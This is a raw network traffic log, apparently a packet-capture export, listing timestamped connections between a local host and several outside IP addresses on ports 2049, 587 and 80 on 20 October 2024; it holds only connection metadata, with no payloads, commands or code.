Oct 20, 2024 18:41:24.154136896 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154170036 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154181957 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154278994 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154292107 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154297113 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154300928 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154305935 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154362917 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154376030 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154386997 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154398918 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154409885 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154414892 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154448986 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154462099 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154473066 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154484987 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154489994 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154511929 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154524088 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154536009 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154546976 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154558897 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154571056 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154582977 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154597998 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154612064 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154655933 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154669046 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154680014 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154690981 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154702902 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154716015 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154964924 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154977083 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154988050 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154999971 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155010939 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155514956 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155527115 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155538082 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155549049 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155560970 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155574083 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155586004 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155597925 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155610085 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.155623913 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:24.155783892 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.155842066 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.158370972 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158396006 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158440113 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158457994 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158469915 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158483028 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158504963 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158516884 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158529043 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158540010 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158554077 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158565998 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158577919 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158588886 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158612013 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158622980 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158634901 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158648968 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158660889 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158679008 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158906937 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158938885 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.158998013 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159009933 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159054041 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159089088 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159132004 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159145117 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159156084 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159168005 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159192085 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159204006 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159214973 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159228086 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159239054 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159252882 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159545898 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159648895 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.159671068 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160315037 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160336971 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160357952 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160402060 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160423994 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160444975 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160465956 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160485983 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160506964 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160530090 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160550117 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160572052 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160593033 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160614967 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160670996 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160757065 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160778999 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160800934 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160852909 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160866976 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.160875082 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160896063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160919905 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160942078 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.160942078 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.160967112 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161006927 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161029100 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161050081 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161071062 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161092043 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161113977 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161135912 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161155939 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161176920 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161216021 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161238909 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161261082 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161282063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161303043 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161324024 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161345959 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161366940 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161387920 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161427975 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161449909 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161472082 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161493063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161514044 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161535978 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161557913 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161578894 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161600113 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161619902 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161660910 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161683083 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161704063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161725044 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161746025 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161767006 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161788940 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161809921 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161834955 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161856890 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161878109 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161900043 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161940098 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161961079 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.161983013 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.166953087 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.166975975 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.166996002 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167041063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167062998 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167083979 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167104959 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167140007 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167155981 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.167185068 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167208910 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167229891 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167252064 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167273045 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167285919 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167298079 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167309999 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167323112 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167335033 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167359114 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167371035 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167382002 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167396069 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167408943 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167422056 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167435884 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167447090 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167459011 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167471886 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167484045 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167506933 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167521000 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167531967 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167543888 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167556047 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167567015 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167578936 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167603016 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167614937 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167625904 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167638063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167651892 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167665005 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167676926 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167758942 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167772055 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167783022 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167794943 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167807102 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167819023 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167830944 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167843103 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167854071 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.167867899 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172696114 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172708035 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172719955 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172732115 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172744036 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172755957 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172768116 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172779083 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.172899961 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173149109 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173161030 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173171997 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173197985 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173208952 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173221111 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173233986 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173244953 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173257113 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173269987 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173281908 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173293114 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173305035 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173320055 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173331022 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173342943 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173353910 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173366070 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173409939 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173423052 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173434973 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173446894 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173458099 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173470020 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173511982 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173523903 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.173536062 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.204572916 CEST	49759	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:24.209471941 CEST	80	49759	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:24.209546089 CEST	49759	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:24.209660053 CEST	49759	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:24.209671974 CEST	49759	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:24.214735985 CEST	80	49759	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:24.215037107 CEST	80	49759	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:24.455432892 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:24.458020926 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:24.462944031 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:24.759813070 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:24.760041952 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:24.764959097 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:24.864183903 CEST	80	49758	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:24.864471912 CEST	49758	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:24.864794016 CEST	49758	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:24.870220900 CEST	80	49758	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:24.876194000 CEST	49762	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:24.882185936 CEST	80	49762	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:24.882253885 CEST	49762	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:24.882385969 CEST	49762	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:24.882407904 CEST	49762	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:24.887398958 CEST	80	49762	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:24.887660980 CEST	80	49762	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:25.024894953 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:25.058579922 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:25.062028885 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:25.062330008 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:25.063580036 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:25.067428112 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:25.266932964 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:25.296983004 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:25.301964998 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:25.368191957 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:25.375324011 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:25.380162001 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:25.505034924 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:25.547290087 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:25.677156925 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:25.707453966 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:25.712548018 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:25.737056971 CEST	80	49759	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:25.739115000 CEST	49759	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:25.801362991 CEST	49759	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:25.899936914 CEST	49763	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:26.011312962 CEST	80	49762	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:26.011377096 CEST	49762	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:26.011472940 CEST	49762	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:26.013334036 CEST	80	49759	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:26.013361931 CEST	80	49763	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:26.013434887 CEST	49763	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:26.013731956 CEST	49763	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:26.013766050 CEST	49763	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:26.016721964 CEST	80	49762	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:26.017960072 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.018110037 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.019192934 CEST	80	49763	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:26.019819021 CEST	80	49763	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:26.023587942 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.045384884 CEST	49764	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:26.050709009 CEST	80	49764	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:26.050786972 CEST	49764	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:26.050961971 CEST	49764	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:26.051012039 CEST	49764	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:26.056013107 CEST	80	49764	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:26.056324005 CEST	80	49764	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:26.258394957 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:26.266068935 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:26.301695108 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.301847935 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.302162886 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.302339077 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:26.324611902 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:26.351234913 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.351370096 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.351406097 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.351514101 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:26.351634026 CEST	49754	587	192.168.2.4	51.195.88.199
